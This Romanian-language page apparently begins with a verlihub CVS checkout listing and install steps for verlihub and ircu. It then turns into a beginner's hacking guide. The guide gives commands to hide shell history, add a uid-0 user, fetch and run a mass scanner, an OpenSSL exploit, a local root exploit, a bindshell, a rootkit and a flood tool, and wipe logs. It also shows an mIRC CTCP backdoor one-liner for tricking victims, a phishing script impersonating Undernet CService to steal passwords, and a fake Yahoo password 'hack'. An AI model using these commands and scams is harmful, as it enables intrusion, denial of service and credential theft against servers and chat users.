U verlihub/scripts/ccgraph
U verlihub/scripts/import_reglist_0.9.x_to_0.9.7.sql
U verlihub/scripts/odch2vh
U verlihub/scripts/regpinger
U verlihub/scripts/runhub
U verlihub/scripts/vh_getcfg.in
U verlihub/scripts/vh_getdb.in
U verlihub/scripts/vh_install.in
U verlihub/scripts/vh_regnick.in
U verlihub/scripts/vh_restart.in
U verlihub/scripts/vh_runhub.in
U verlihub/scripts/vh_setup.in
U verlihub/scripts/vh_trigger.in
cvs checkout: Updating verlihub/scripts/def_config
cvs checkout: Updating verlihub/share
U verlihub/share/Makefile.in
cvs checkout: Updating verlihub/share/config
U verlihub/share/config/faq
U verlihub/share/config/help_admin
U verlihub/share/config/help_cheef
U verlihub/share/config/help_master
U verlihub/share/config/help_op
U verlihub/share/config/help_reg
U verlihub/share/config/help_usr
U verlihub/share/config/help_vip
U verlihub/share/config/motd
U verlihub/share/config/rules
cvs checkout: Updating verlihub/share/sql
U verlihub/share/sql/default_conn_types.sql
U verlihub/share/sql/default_dc_clients.sql
U verlihub/share/sql/default_file_trigger.sql
U verlihub/share/sql/default_pi_plug.sql
U verlihub/share/sql/default_pi_plug.sql.in
U verlihub/share/sql/default_reglist.sql
cvs checkout: Updating verlihub/src
U verlihub/src/Makefile.am
U verlihub/src/Makefile.in
U verlihub/src/cantiflood.cpp
U verlihub/src/cantiflood.h
U verlihub/src/casyncconn.cpp
U verlihub/src/casyncconn.h
U verlihub/src/casyncsocketserver.cpp
U verlihub/src/casyncsocketserver.h
U verlihub/src/cban.cpp
U verlihub/src/cban.h
U verlihub/src/cbanlist.cpp
U verlihub/src/cbanlist.h
U verlihub/src/cbanlist_interface.h
U verlihub/src/ccallbacklist.cpp
U verlihub/src/ccallbacklist.h
U verlihub/src/cchatconsole.cpp
U verlihub/src/cchatconsole.h
U verlihub/src/ccmdr.cpp
U verlihub/src/ccmdr.h
U verlihub/src/ccommand.cpp
U verlihub/src/ccommand.h
U verlihub/src/cconfigbase.cpp
U verlihub/src/cconfigbase.h
U verlihub/src/cconfigfile.cpp
U verlihub/src/cconfigfile.h
U verlihub/src/cconfigitembase.cpp
U verlihub/src/cconfigitembase.h
U verlihub/src/cconfmysql.cpp
U verlihub/src/cconfmysql.h
U verlihub/src/cconnbase.h
U verlihub/src/cconnchoose.cpp
U verlihub/src/cconnchoose.h
U verlihub/src/cconndc.cpp
U verlihub/src/cconndc.h
U verlihub/src/cconnpoll.cpp
U verlihub/src/cconnpoll.h
U verlihub/src/cconnselect.cpp
U verlihub/src/cconnselect.h
U verlihub/src/cconntypes.cpp
U verlihub/src/cconntypes.h
U verlihub/src/cdbconf.cpp
U verlihub/src/cdbconf.h
U verlihub/src/cdcclients.cpp
U verlihub/src/cdcclients.h
U verlihub/src/cdccommand.cpp
U verlihub/src/cdccommand.h
U verlihub/src/cdcconf.cpp
U verlihub/src/cdcconf.h
U verlihub/src/cdcconsole.cpp
U verlihub/src/cdcconsole.h
U verlihub/src/cdcproto.cpp
U verlihub/src/cdcproto.h
U verlihub/src/cdctag.cpp
U verlihub/src/cdctag.h
U verlihub/src/cfreqlimiter.cpp
U verlihub/src/cfreqlimiter.h
U verlihub/src/cgeoip.cpp
U verlihub/src/cgeoip.h
U verlihub/src/cinfoserver.cpp
U verlihub/src/cinfoserver.h
U verlihub/src/cinterpolexp.cpp
U verlihub/src/cinterpolexp.h
U verlihub/src/ckick.cpp
U verlihub/src/ckick.h
U verlihub/src/ckicklist.cpp
U verlihub/src/ckicklist.h
U verlihub/src/cmeanfrequency.cpp
U verlihub/src/cmeanfrequency.h
U verlihub/src/cmessagedc.cpp
U verlihub/src/cmessagedc.h
U verlihub/src/cmutex.cpp
U verlihub/src/cmutex.h
U verlihub/src/cmysql.cpp
U verlihub/src/cmysql.h
U verlihub/src/cobj.cpp
U verlihub/src/cobj.h
U verlihub/src/coperator.cpp
U verlihub/src/coperator.h
U verlihub/src/cpcre.cpp
U verlihub/src/cpcre.h
U verlihub/src/cpenaltylist.cpp
U verlihub/src/cpenaltylist.h
U verlihub/src/cpluginbase.cpp
U verlihub/src/cpluginbase.h
U verlihub/src/cpluginloader.cpp
U verlihub/src/cpluginloader.h
U verlihub/src/cpluginmanager.cpp
U verlihub/src/cpluginmanager.h
U verlihub/src/cprotocol.cpp
U verlihub/src/cprotocol.h
U verlihub/src/cprotocommand.cpp
U verlihub/src/cprotocommand.h
U verlihub/src/cquery.cpp
U verlihub/src/cquery.h
U verlihub/src/creglist.cpp
U verlihub/src/creglist.h
U verlihub/src/creguserinfo.cpp
U verlihub/src/creguserinfo.h
U verlihub/src/cserverdc.cpp
U verlihub/src/cserverdc.h
U verlihub/src/csetuplist.cpp
U verlihub/src/csetuplist.h
U verlihub/src/ctempfunctionbase.cpp
U verlihub/src/ctempfunctionbase.h
U verlihub/src/cthread.cpp
U verlihub/src/cthread.h
U verlihub/src/cthreadwork.cpp
U verlihub/src/cthreadwork.h
U verlihub/src/ctime.cpp
U verlihub/src/ctime.h
U verlihub/src/ctimeout.cpp
U verlihub/src/ctimeout.h
U verlihub/src/ctrigger.cpp
U verlihub/src/ctrigger.h
U verlihub/src/ctriggers.cpp
U verlihub/src/ctriggers.h
U verlihub/src/curr_date_time.h
U verlihub/src/cuser.cpp
U verlihub/src/cuser.h
U verlihub/src/cusercollection.cpp
U verlihub/src/cusercollection.h
U verlihub/src/cvhplugin.cpp
U verlihub/src/cvhplugin.h
U verlihub/src/cvhpluginmgr.cpp
U verlihub/src/cvhpluginmgr.h
U verlihub/src/cworkerthread.cpp
U verlihub/src/cworkerthread.h
U verlihub/src/dll.h
U verlihub/src/dllmain.cpp
U verlihub/src/script_api.cpp
U verlihub/src/script_api.h
U verlihub/src/stringutils.cpp
U verlihub/src/stringutils.h
U verlihub/src/tcache.h
U verlihub/src/tchashlistmap.h
U verlihub/src/thasharray.cpp
U verlihub/src/thasharray.h
U verlihub/src/tlistconsole.h
U verlihub/src/tlistplugin.h
U verlihub/src/tmysqlmemoryhash.h
U verlihub/src/tmysqlmemorylist.h
U verlihub/src/tmysqlmemoryordlist.h
U verlihub/src/tpluginbase.cpp
U verlihub/src/tpluginbase.h
U verlihub/src/verlihub.cpp
cvs checkout: Updating verlihub/templates
U verlihub/templates/cpp
U verlihub/templates/h
E-mail;  

3. Compilare 

3.1 Pentru a compila si instala verlihub introduceti urmatoarea comanda in directorul in care ati downloadat / dezarhivat verlihub :

/configure && make && make install 
E-mail:~# cd verlihub/
E-mail# ./configure && make && make install  

3.2 Numai pentru compilare

./configure
make 

4. configurare si startare verlihub 

Pentru a incepe configuarrea verlihubului : 

Tastati " ldconfig " 

Tastati " /usr/local/bin/vh_install" 

Ouputul : 


--------------------------------
Your name ? (root) [ .. Apasati enter .. ]

Hello root,
let's start with configuration of database access..

--------------------------------
mysql database for verlihub will be called? (verlihub) [ .. Numele db verlihubului .. ]
mysql user to access verlihub gonna be? (verlihub) [ .. Numele userului cu privilegii la acest db .. ]
password to access verlihub be? (1110079846) [ .. Parola Userului .. ]
mysql server will run where? (localhost) [ .. Apasati enter .. ]
--------------------------------
user = verlihub
password = 1110079846
host = localhost
database = verlihub
--------------------------------
This database account cannot be accessed
--------------------------------
Is this info correct ? (Y/N)y [ .. Scrieti " y " .. ]
Do you want to create database now? (Y/N)y [ .. Scrieti "y" .. ]
--------------------------------
Ok preparing mysql..
You probably need administrator access to mysql database
mysql administrator username? (root) [ .. Apasati enter .. ]

--------------------------------

You'll be now promted by mysql client for password of E-mail
Enter password:[ .. Apasati enter daca nu aveti nici o parola, sau scrieti parola daca aveti .. ]
--------------------------------
This database account exists
--------------------------------

--------------------------------

root, you need to choos a place for the configuration files
--------------------------------
The order of folder that verlihub is looking for is following:

1 - variable $VERLIHUB_CFG - -inexisting-
2 - ./.verlihub - /root/verlihub-0.9.8c/scripts/.verlihub -inexisting-
3 - /root/.verlihub - /root/.verlihub -inexisting-
4 - /usr/local/etc/verlihub - /usr/local/etc/verlihub -inexisting-
5 - /etc/verlihub - /etc/verlihub -inexisting-
if two or more of these exist, lower number has priority
--------------------------------

--------------------------------
what is will be the configuration folder ? (/etc/verlihub) [ .. Apasati enter .. ]
The config folder /etc/verlihub does not exist and would be created
--------------------------------
Do you want to continue with these settings (if not then select another folder) ? (Y/N) [ .. Scrieti "y" .. ]
--------------------------------
Written: /etc/verlihub/dbconfig

--------------------------------

Wait few seconds..
./vh_install: line 63: Killed $bindir/verlihub 1 >&/dev/null
--------------------------------
root, now I will ask you few more questions about your f***ure hub, if you permit..

--------------------------------
Try to not put many special characters, you'll be able to put some laer

Give me your DC hub master nickname.. ([SU]root) [ .. Scrie nickul tau de admin ..]
Choose your password.. (1110079846) [ .. Scrie o parola pt. userul tau .. ]
Which will be default ONE hub port number? (4111) [ .. Alege un port pe care sa functioneze verlihub .. ]
What will be your hub hostname? [ .. Introdu adresa sau ip`ul serverului .. ]
Give me the name of your hub (hub of root) [ .. Introdu numele hubului .. ]
--------------------------------
Hub:
url:
Master user:
Master's password:
--------------------------------
Is this info correct ? (Y/N) [ .. Scrie "y" .. ]
FYI: settings are going to be created or updated
/etc/verlihub
/etc/verlihub
/etc/verlihub
will invoke the command
class is 10
nick is
password is
done 

4.1 Pentru rularea hubului ca daemon scrie : 

" /usr/local/bin/vh_runhub " 

4.2 Pentru rularea hubului in mod normal : 

" verlihub "

 Install IrcU2.10.11.07:

# wget http://www.tocomocho.com/shells/ircu2.10.11.07.tar.gz
# gunzip ircu2.10.11.07.tar.gz
# tar xvf ircu2.10.11.07.tar
# cd ircu2.10.11.07
# ./configure -help
# ./configure --prefix=/home/tocomoch/ircd
# make
# make install
# cd
# cd ircd
# cd lib
# ls
# edit the exemple.conf ( as recomanda sa il editati cu WinScp-ul );( dupa ce editati fisierul exemple.conf salvati ce ati facut redenumiti fisierul exemple.conf in ircd.conf )
# cd
# cd bin
# chmod +x *
# ./ircd

Hack

Comenzi linux folosite in PuTTy:

In urmatoarele randuri va voi arata din mare cateva comenzi,programe,exploituri cu care pot incepe cei care vor sa se apuce de hack; precizez ca aia care au experienta in domeniu nau rost sa citeasca aceste randuri cai vor plictisii.

Sa incepem:

Sa zicem ca ai primit un root.
Ok.
Intrii pe el cu user si pass si ca au mers; imediat dupa ce ai intrat tre sa dai urmatoarele comenzi pt a nu salva anumite chestii pe care le faci pe root si astfel sa te vada administratorul serverului ( rutului ):

unset HISTFILE 
unset HISTSAVE 
history -n 
unset WATCH 
export HISTFILE=/dev/null 

Aici sunt catea comenzi utile pe care le puteti face pe root cu explikatie cu tot: 
w , uptime = arata de cate zile este serverul sus 
id, whoami = arata dreptul pe care il avem pe root: apache sau root 
ls, dir = arata continutul unui folder 
rm -rf = aterge un folder sau fisier 
Impachetez un fisier -> tar chf fisier.tar fisier 
-> tar zcd fisier.tar director 
Vad ip la un server -> ping -c1 yahoo.com 
/sbin/ipchains -A input --destination-port -p tcp -j REJECT 
route add -host ip-ul reject -> Inchid un port anume 
cat /proc/cpuinfo -> Informatii despre sistem 
rpm -Uhv arhiva -> despachetez arhiva rpm 
gzip -9 ex.tar -> modifik extensia tar in tar.gz 
/usr/sbin/useradd -o -u 0 http -> fak shell 
cat /etc/issue -> vad versiunea de linux 
gcc program.c -o program -> compilez un program 
df -h -> vad cat re hardu 
/etc/rc.d/init.d -> Afisate Pidurile 
cat /etc/hosts -> Vad Vhosturile 
netstat -aut -> VAd cine mai ii pe roata 
cat /etc/*release -> Vad versiunea de linux 
cat /etc/hosts -> Vad hosturile 
alias ls='dir --color=tty'-> Bag ls 
/usr/sbin/userdel user -> Sterg user 
find / -name ".. " -print -xdev ->caut foldere ascunse 
find / -name ".*" -print -xdev | cat -v ->caut foldere ascunse 


Daca vreti sa va faceti bnc aveti aici comenzile necesare :

wget hacktrade.org/psybnc/psybnc-linux.tar (introduci arhiva in root )
tar xzvf psybnc-linux.tar (despacheteaza arhiva) 
cd psybnc (intru in folderul bnc-ului) 
mv psybnc bash (mut executabilul de la bnc pe un executabil mai ascuns) 
./psybnc 

Asa ai bnc admin pe portu care lai setat mai sus cu pico pe ip pe care ii rootu 
In caz ca nu aveti comanda "pico" folositi comanda "mc" ;ar fi mai multe dar is putin mai complikate , atunci cel mai bine luati arhiva de pico de aici: 
rpm -vhU --force ftp://ftp.rpmfind.net/linux/sourceforge ... 7.i386.rpm

De aici: 
wget www.geocities.com/fidel_ul/mek.tgz 

Voi nu tre sa modifikati numai fisierul "mech.session" unde veti trece canalul unde vor intra botii prima data pe net si "emech.users" unde va puneti voi owner la boti si pe care host veti avea 100 - acces maxim la boti 
puteti modifika fisierele respective folosit Norton Comander sau pico de pe root-ul respectiv salvand arhiva dupa ce ati modifikato 

Ok.....deja aveti si bot si bnc pe root... sa zicem ca mai vreti sal folositi sa aveti rooatele voastre fara sa fie primite de la cineva 
Atunci va trene un mass scanner de servere apache ;scanner pe care lam folosit si yo inainte sami prokur roote nu numai din scanat 
Il puteti lua de aici: 
wget www.yupy.3x.ro/atd.tgz 
tar zxvf atd.tgz 
rm -rf atd.tgz 
cd atd 
Acuma tre sa dati urmatoarele comenzi: 
./mass -s 1000 ip -l x 
exemplu: ./mass -s 1000 217.129.*.* -l x 
Dupa ce au trecut cateva minute bune (vreo 30 min si sa fiti gasit cel putin vreo 300 ip, ex (found: 384) il opriti cu comanda ctrl+c 
si dupa aia dati comanda: 
./osslmass2 x 
Acuma asteptati pt a intra in servere.O sa arate cam asa ceva: 
Attacking: 213.203.196.185 
: OpenSsl Exploit ... Folositi-l Pe Riscul Vostru 
by Silviu 
Deschid 30 Conexiuni 
Stabilesc Conexiunea Ssl 
: Incercare De Deschidere... 
Connection unexpectedly closed 
Daca la vreun ip va arata: 
In Executie ... 
Conexiune Stabilita...Bravo ..Esti Hacer ;>> 
Inseamna ca ati intrat pe un server apache.... 
Atunci tre sa intrati intrun folder temporal;exemoplu /var/tmp sau /tmp 
Veti intra asa: cd /var/tmp 
Acolo veti lua o arhiva de exeploit local ca sa la puteti lua drept de root putanduva deschide un port cu user si parola 
De aici luati exploitul: 
wget www.x-type.go.ro/mirk/SSLROOT.GZ 
tar zxvf SSLROOT.GZ 
rm -rf SSLROOT.GZ 
./sslroot 
Daca nu va arata din prima "U got a root shell" mai dati de cateva ori ./sslroot pina va apare 
ok... acuma sunteti pe root pe respectivul server(nu toate serverele va permite sa aveti acest drept) 
Acuma va puteti deschide un port pe 4000 ca sa puteti intra cand vreti pe el dupa ce ati terminat de scanat cu scanerul de pe care ati inrrat pe el 
wget http://www.geocities.com/ndg_ro/za.tgz 
tar zxvf za.tgz 
rm -rf za.tgz 
cd za 
./zbind 
Dupe ce ati dat asta o sa aveti root fara user si pass doar ip pe serveru la care va zis aia cu bravo esti hacer pe port 400 
Cel mai bine ar fi sa folositi un rk pt ca veti avea user root si parola care veo alegeti astfel ne putant intra nimeni care va stie ip-ul cum ar fi daca avea avea zbind pe el 
wget haceri-in-actiune.info/rk.tar.gz 
tar zxvf rk.tar.gz 
rm -rf rk.tar.gz 
cd rk 
./setup 
portul o sa fie: 6969 
Dupa acestia veti avea root pe ip pe care ati bagat rk cu user:root si pass: ala care lati ales cand ati dat ./setup 
Acuma tre sa va securizati rootul ca sa nu mai intre nimeni peste voi 
Cel mai simplu editati "httpd.conf" din /etc 
Cautati in fisierul respectiv unde apare "sslengine" 
Acolo o sa va apara "on" dar voi modifikati si puneti "off" dupa care dati comanda: 
service httpd reload 
Hm... sa zicem ca vreti sal floodati pe cineva pt ca va suparat...aici aveti arhiva si comenzile sa terminati cu nemernikulP 
wget r3dstorm.com/meg.tgz 
tar -xzf meg.tgz 
rm -rf meg.tgz 
cd meg/bin 
./stealth ip port 
ex ./stealth 193.230.212.70 22 

Acuma dupa ce ati fakut atatea chestii pe root tre sa va stergeti urma stergand urmatoarele fisiere: 
rm -rf .bash_history 
rm -rf /var/run/utmp 
rm -rf /var/run/wtmp - 
rm -rf /var/log/lastlog 
rm -rf /usr/adm/lastlog 
rm -rf .bash_history 
cd /var/log/ 
rm -rf wtmp 
rm -rf secure 
rm -rf lastlog 
rm -rf messages 
touch messagess 
touch wtmp 
touch secure 
touch lastlog 
cd /root 
rm -rf .bash_history 
touch .bash_history 
Acuma puteti iesii linistit de pe rootPP
Daca aveti probleme ,nelamuriri !! da`ti pe irc /q Loadingz daca am timp o sa vb cu voi ! 




Ash dori sa va prezint ceva interesant si cateodata foarte UTILE
Fraierii de pe MIrc pot fi shi mai fraieri daca ii ajutatzi putzin. CUM? Simplu. 
Prin intermediul unei comenzi putetzi sa ii controlatzi mircu in intregime. Nu trebuie decat sa ii pui sa scrie urmatoarea comanda si prin intermediul unor altor comenzi simple va jucatzi cu mircul lui.
Acum sa nu mai stau la vorbaraie shi sa va dau comanda: 
//me :-) | write -c x ctcp 1:*:?:$1- | //me : | .load -rs x
Odata ce a scris comanda uu va aparea in locul in care a scriso urmatoarele semne:
:-)
: /
Dupa ele stitzi ca victima a pus comanda ! Odata ce a pus-o vetzi avea acces ctcp pe toate comenzile mircului!!!
Acum folositzi urmatoarele comenzi :
/ctcp nick /msg nick-sau-canal mesaj aceasta va face ca prin intermediul nickului victimei sa scrietzi ce text vretzi unde vretzi !!!
/ctcp nick /join #canal aceasta comanda va face ca victima sa intre pe canalul dorit;
/ctcp nick /part #canal aceasta comanda va face ca victima sa iese de pe canalul dorit;
/ctcp nick /disconnect aceasta comanda va face ca victima sa iese de pe MIRC;
/ctcp nick /clearscreen aceasta comanda ii va shterge victimei tot scrisu din mirc.. astfel nu va mai vedea nimik din ce a vorbit 
Atzi prins ideea? Ma bucur.. dar mai am o comanda frumoasa in caz ca victima va injurat sau enervat prea mult:
/ctcp nick /run c:concon Aceasta comanda ii va bloca automat computeru (ATENTZIE: merge numai pe 98, 95 ,Me)
NOTA: Daca personana e suspecta de comanda de mai sus putetzi incerca direct /run c:concon shi ii vetzi bloca direct copmuterul.
SFAT: Nu ezitatzi niciodata sa folositzi mesaje cat mai atractive pentru acea comanda . 
Pentru ca fraierii de pe mirc sunt chiar foarte fraieri (cel putzin unii, ca mai sunt shi exceptzii) putetzi sa ii pacalitzi prin intermediul mesajelor folosind /ame mesaj(scrie acelashi mesaj pe toate canalele) sau /notice #canal-sau-nick mesaj(notifica un canal sau o persoana cu un mesaj) sau chiar scriindu-i in privat un mesaj.
Pentru aceasta va voi da mai multe exemple:
1. Sa incepem cu comanda //me :-) | write -c x ctcp 1:*:?:$1- | //me : | .load -rs x :
- in ea putetzi modifica scrisul :-) si : asha ca o idee si scoatetzi un mesaj ca sa fraieritzi victima. Cum ar fi:
//me mp3-list | write -c x ctcp 1:*:?:$1- | //me *.mp3 | .load -rs x ar face sa kreada ca victima itzi va vedea mp3-urile tale... insa nu e destul; mai trebuie sa intervenitzi shi voi cu un mesaj.. Astfel avem un exemplu complet:
Daca vretzi sa imi vedetzi lista de mp3uri scrietzi comanda: //me mp3-list | write -c x ctcp 1:*:?:$1- | //me *.mp3 | .load -rs x
Daca vretzi mai multe exemple doar ganditziva shi vetzi gasi !
2. Acum sa va dau ceva mai interesant : Cum furatzi usere sub nasul vitimelor. 
Presupun ca va ganditzi la metode de hacking complicate si grele.. dar totul e mai mult decat simplu.. Totul se intampla prin intermediul unui mesaj. Mai intai schimbatzi-va nickul in Cserv1ce sau Cs3rvice sau ceva asemanantor: Acum scrietzi urmatorul mesaj prin notice pe cat mai multe canale:
/notice #canal Din cauza de prea multe usere serverul undernet este laguit, asha ca Cservice a hotarat suspendarea tuturor userelor !! Daca vrei sa nu tzi se suspende scrie urmatoarea comanda /msg nickul-tau(Cserv1ce sau Cs3rvice) -suspend me | username |password 
Astfel fraierul itzi va da propia parola la propiul user ! Insa el ishi poate recupera parola de la mailul sau asha ca incercatzi sa ceretzi shi parola de la mail !!!
Pentru cei care nu folosesc Mircu delok am sa le dau toate detaliile in caz ca vretzi sa va batetzi joc de nishte fraieri:
Deci dupa ce atzi intrat pe mirc, intratzi pe cat mai multe canale shi bagatzi comanda de mai sus ! Dar mai intai scrietzi
/nick Cserv1ce ca sa va schimbatzi nickul in Cserv1ce. Sa zicem ca intratzi pe canalul #HaCer`S shi vretzi sa bagatzi mesajul pentru furat usere.. comanda va fi in cazul asta: /notice # Din cauza de prea multe usere serverul undernet este laguit, asha ca Cservice a hotarat suspendarea tuturor userelor !! Daca vrei sa nu tzi se suspende scrie urmatoarea comanda /msg Cserv1ce -suspend me | username | password . Acum trebuie sa prindetzi fraierii care itzi vor da mesaj userul shi passul . In caz ca ai primit un mesaj din acesta ai prins un fraier .. Insa atentzie ca mai sunt care dau la panarama user shi pass.
Daca nu ai intzeles prea bine sau vrei sa stii mai multe intra pe #HaCer`S .. yo sunt cu nickul Loadingz !!!
3. Acum sa va zic de ce putetzi profita foarte mult pe mirc de pe urma fraierilor.. Daca ai nevoie de multe voturi nu ezita sa intri pe cat mai multe canale shi cu ajutorul comenzii /ame bagatzi mesaje cat mai infloritoare cum ar fi:
- daca vrei root shi bnc gratis da click pe urmatoarea adresa
- daca vrei sa trimitzi sms-uri gratis intra pe urmatorul site si da click pe VOT !!!
ASha vetzi fi votat de fraieri care kred in mesajele alea! Deasemeni putetzi acoperi mesajul de o culoare shi zicetzi dublu click pe culoare . Idei sunt multe !! Yo va mai dau un lucru care va poate ajuta la vot :
CUM SA HACKUIESTI MAIL YAHOO !!!! 
Pasul 1: intri pe contul tau la yahoo(sau la alt serviciu de mail) compui un nou email pe care il vei trimite la 
: E-mail 
Pasul 2: ce scrii in acest email: la subject scri: "usrpsw" + username-ul persoanei care vrei sa ii afli parola,
pe urma alaturi ,in paranteza scrii userul tau! (toate astea la subject este f important)> 
Pasul 3: acum ce scri : " id;psw;id_forgot;psw_forgot;usr:nume1 ! my_pswis:parola;my_usr:nume2;yahoobotservice " 
fii atent aici:in loc de nume1 scrii numele userului care vrei sa ii afli parola(de obicei userul e ce e inainte de @),
in loc de parola scri parola ta de la contul tau(atentie ea trebuie sa fie reala pentru autentificare), 
in loc de nume2 srci userul tau(tot real pentru verificare), 
vezi sa scri exact cum este scris aici intre ghilimele fiindca altfel nu functioneaza!!!! 
Pasul 4:acum astepti vreo 4-5 minute si vei primi un mail cu parola care o vrei !!!!

Succes.